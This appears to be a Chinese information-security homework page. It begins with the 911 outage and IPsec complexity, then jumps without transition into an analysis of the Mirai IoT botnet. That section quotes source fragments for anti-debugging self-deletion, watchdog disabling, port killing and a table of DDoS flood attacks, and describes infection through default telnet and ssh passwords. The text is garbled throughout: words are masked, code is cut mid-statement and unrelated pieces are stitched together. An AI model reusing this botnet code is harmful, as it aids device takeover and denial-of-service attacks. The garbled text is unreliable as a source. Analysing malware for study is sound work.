信息安全作业

一．复杂性是安全性的敌人：

1. 一款由 intrado **商提供的软件系统，持续计数一个变量来记录路全国各地呼叫 911 的**数量。intrado 的程序员给这个变量设置了一个上限值选择了一个百万的数字。

为了满足移动**的兴起和新功能的需求，程序员开发了一个依赖于互联网更为复杂的系统。这款911系统在华盛顿、加利福利亚、卡罗莱纳州、佛罗里达州和明尼苏达州的调度中心，为1100万美国人服务，结果在刚开发完不久，就出现了四次宕机。而修复bug只是修改了一个变量。

2. tisec协议。

复杂性是安全最大的敌人，作为一个安全协议，ipsec的复杂性由来已久，ipsec的复杂性在于，它包含有太多的选项和太多的灵活性。这种复杂性引起了大量的歧义、矛盾、低效和缺陷。其密钥交换协议的模式组合繁多，共享密钥、公钥对、数字证书等多种凭证更是增加了协议的复杂性，可用性变差。

数据封装协议由于早期美国对密码算法对外出口的限制也存在多种模式，这些因素综合导致了ipsec协议本身和应用上存在安全问题和应用场景限制。同时由于ipsec技术未定义vpn数据转交方式，被保护两端网络构建vpn必须为不同的子网。而tisec协议设计包含了ip地址漫游技术和dr数据转交技术，这两种技术主要解决vpn组网时存在的子网冲突问题以及静态路由指向问题。

主要包含两个文件夹，其中loader文件夹为加载器，完成服务端创建和状态监控的功能；mirai文件夹完成主要的恶意功能，包含网络连接、执行、**（等工具的实现）以及主控端操作功能。

攻击者通过ssh或telnet账号，使用默认密码入侵物联网设备。

**实现的恶意功能从源码来看，主要包含3方面，主要是bot文件夹，实现反调试、隐藏自身进程、设置初始的域名端口值、设置默认弱口令、网络连接及攻击功能；tools文件夹，实现wget、更新文件、异或数据等工具性功能。cnc文件夹能够在主控端对成功感染的bot进行监控并作为接收指令端解析指令并发起攻击。

同时bot文件夹下实现功能时，会打开pf_inet（原始套接字，tcp的unix网络套接字），并将它绑定到本地主机ip地址127.0.0.

1的端口tcp/48101，之后开始监听连入连接。一旦网络中有一个设备受感染，则会通过telnet服务连接，进一步扩大感染范围。

从**函数功能上看，具有以下功能：

反gdb调试，解析cc地址，网络连接、实现攻击等功能。

static void anti_gdb_entry(int

static void resolve_cnc_addr(void

static void establish_connection(void);

static void teardown_connection(void);

static void ensure_single_instance(void);

static bool unlock_tbl_if_nodebug(char *)

如果监测到gdb调试，则进行自删除，阻止watchdog重新启动设备，并显示连接cc地址失败。

/ delete self

unlink(args[0]);

// signal based control flow

sigemptyset(&sigs);

sigaddset(&sigs, sigint);

sigprocmask(sig_block, &sigs, null);

signal(sigchld, sig_ign);

signal(sigtrap, &anti_gdb_entry);

// prevent watchdog from rebooting device

if ((wfd = open("/dev/watchdog", 2)) 1 ||

(wfd = open("/dev/misc/watchdog", 2)) 1)

chdir("/

确保每次只有一个实例运行（通过连接本地端口48101）,并通过此端口号关闭相对应的进程。

= af_inet;

= local_bind ? inet_addr(127,0,0,1)) local_addr;

= htons(single_instance_port);

// try to bind to the control port

errno = 0;

if (bind(fd_ctrl, (struct sockaddr *)addr, sizeof (struct sockaddr_in)) 1)

]攻击方式。

bool attack_init(void)

int i;

add_attack(atk_vec_udp, (attack_func)attack_udp_generic);

add_attack(atk_vec_vse, (attack_func)attack_udp_vse);

add_attack(atk_vec_dns, (attack_func)attack_udp_dns);

add_attack(atk_vec_udp_plain, (attack_func)attack_udp_plain);

add_attack(atk_vec_syn, (attack_func)attack_tcp_syn);

add_attack(atk_vec_ack, (attack_func)attack_tcp_ack);

add_attack(atk_vec_stomp, (attack_func)attack_tcp_stomp);

add_attack(atk_vec_greip, (attack_func)attack_gre_ip);

add_attack(atk_vec_greeth, (attack_func)attack_gre_eth);

/add_attack(atk_vec_proxy, (attack_func)attack_app_proxy);

add_attack(atk_vec_http, (attack_func)attack_app_http);

return true;

端口初始化，通过端口号关闭使用telnet、ssh、http服务的其他进程，并防止其重新启动。

// kill telnet service and prevent it from restarting

#ifdef killer_rebind_telnet

#ifdef debug

printf("[killer] trying to kill port 23");

#endif

if (killer_kill_by_port(htons(23)))

else {

#ifdef debug

printf("[killer] failed to kill port 23");

信息安全作业

信息安全作业

信息安全导论作业

信息安全基础作业

其他用户还读了